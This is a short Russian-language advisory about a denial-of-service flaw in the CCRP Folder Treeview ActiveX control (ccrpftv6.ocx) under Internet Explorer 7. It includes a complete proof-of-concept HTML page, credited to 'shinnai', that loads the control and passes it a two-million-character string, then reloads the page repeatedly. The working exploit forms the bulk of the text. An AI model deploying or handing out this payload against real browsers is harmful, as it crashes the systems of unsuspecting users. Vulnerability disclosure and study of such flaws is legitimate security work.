Программа: Microsoft Internet Explorer 7
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных в ccrpftv6.ocx. Атакующий может передать специально сформированные данные, что приведет систему к отказу в обслуживании.
Пример:
<!--
-------------------------------------------------------------------------------
CCRP Folder Treeview Control (ccrpftv6.ocx) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-------------------------------------------------------------------------------
-->
<html>
<object classid='clsid:19B7F2D6-1610-11D3-BF30-1AF820524153' id='CCRP' ></object>
<script language='vbscript'>
argCount = 1
arg1=String(2000000, "A")
CCRP.RootFolder = arg1
</script>
<script language='javascript'>
document.location.reload()
</script>
